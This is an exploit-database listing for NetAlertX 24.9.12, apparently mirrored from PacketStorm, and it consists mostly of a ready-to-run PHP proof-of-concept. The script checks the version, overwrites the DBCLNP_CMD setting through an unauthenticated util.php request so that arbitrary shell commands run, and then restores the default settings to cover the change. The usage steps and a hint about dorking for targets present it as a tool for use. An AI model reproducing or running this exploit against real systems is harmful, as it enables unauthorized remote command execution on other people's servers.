Exploit for NetAlertX 24.9.12 Code Execution

Name: Exploit for NetAlertX 24.9.12 Code Execution
Rating: 5 (106 reviews)
2025-02-28 | CVSS 7.9
## https://sploitus.com/exploit?id=PACKETSTORM:189474
=============================================================================================================================================
    | # Title     : NetAlertX 24.9.12 PHP Code Injection Vulnerability                                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://netalertx.com/                                                                                                      |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] An RCE (Remote Command Execution) exploit targeting NetAlertX, where an attacker can update settings without authentication, leading to command execution on the system.
     
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php 
    
    [+] SeT target  = Line : 111
    
    [+] PayLoad :
    
    <?php
    
    class NetAlertXExploit {
        private $target;
        private $port;
        private $waitTime;
        private $cleanup;
        private $baseUrl;
    
        public function __construct($target, $port = 20211, $waitTime = 75, $cleanup = true) {
            $this->target = $target;
            $this->port = $port;
            $this->waitTime = $waitTime;
            $this->cleanup = $cleanup;
            $this->baseUrl = "http://$target:$port";
        }
    
        private function sendRequest($method, $uri, $data = null) {
            $url = "{$this->baseUrl}$uri";
            $options = [
                'http' => [
                    'method' => $method,
                    'header' => "Content-Type: application/json\r\n",
                    'ignore_errors' => true
                ]
            ];
            if ($data) {
                $options['http']['content'] = json_encode($data);
            }
            return file_get_contents($url, false, stream_context_create($options));
        }
    
        public function check() {
            echo "[*] Checking if target is vulnerable...\n";
            $res = $this->sendRequest("GET", "/maintenance.php");
    
            if (!$res) {
                echo "[-] Target is not reachable.\n";
                return false;
            }
    
            preg_match('/Installed version.*?([\d.]+)/', $res, $matches);
            if (!$matches) {
                echo "[-] Failed to detect version.\n";
                return false;
            }
    
            $version = $matches[1];
            if (version_compare($version, "23.01.14", ">=") && version_compare($version, "24.9.12", "<=")) {
                echo "[+] Vulnerable version detected: $version\n";
                return true;
            }
    
            echo "[-] Target is not vulnerable (Version: $version).\n";
            return false;
        }
    
        public function exploit($cmd) {
            echo "[*] Exploiting target...\n";
            $payload = "/bin/sh -c \"$cmd\"";
            $this->updateSettings($payload, "*");
    
            echo "[*] Waiting for settings update...\n";
            sleep($this->waitTime);
    
            echo "[*] Adding payload to execution queue...\n";
            $this->addToExecutionQueue("run|DBCLNP");
            $this->addToExecutionQueue("cron_restart_backend");
    
            echo "[+] Payload sent successfully!\n";
        }
    
        private function updateSettings($cmd, $schedule) {
            $data = [
                'function' => 'savesettings',
                'settings' => [
                    ['DBCLNP', 'DBCLNP_RUN', 'string', 'schedule'],
                    ['DBCLNP', 'DBCLNP_CMD', 'string', $cmd],
                    ['DBCLNP', 'DBCLNP_RUN_SCHD', 'string', "$schedule * * * *"],
                ]
            ];
            $res = $this->sendRequest("POST", "/php/server/util.php", $data);
            if (!$res) {
                die("[-] Failed to update settings.\n");
            }
            echo "[+] DBCLNP_CMD updated to '$cmd'.\n";
        }
    
        private function addToExecutionQueue($cmd) {
            $data = [
                'function' => 'addToExecutionQueue',
                'action' => uniqid() . "|$cmd"
            ];
            $res = $this->sendRequest("POST", "/php/server/util.php", $data);
            if (!$res) {
                die("[-] Failed to add payload to execution queue.\n");
            }
        }
    
        public function cleanup() {
            if (!$this->cleanup) return;
    
            echo "[*] Restoring original settings...\n";
            $defaultCmd = 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}';
            $this->updateSettings($defaultCmd, "*/30");
            echo "[+] Cleanup completed.\n";
        }
    }
    
    // الاستخدام
    $target = "192.168.1.100";
    $exploit = new NetAlertXExploit($target);
    if ($exploit->check()) {
        $exploit->exploit("id");
        $exploit->cleanup();
    }
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================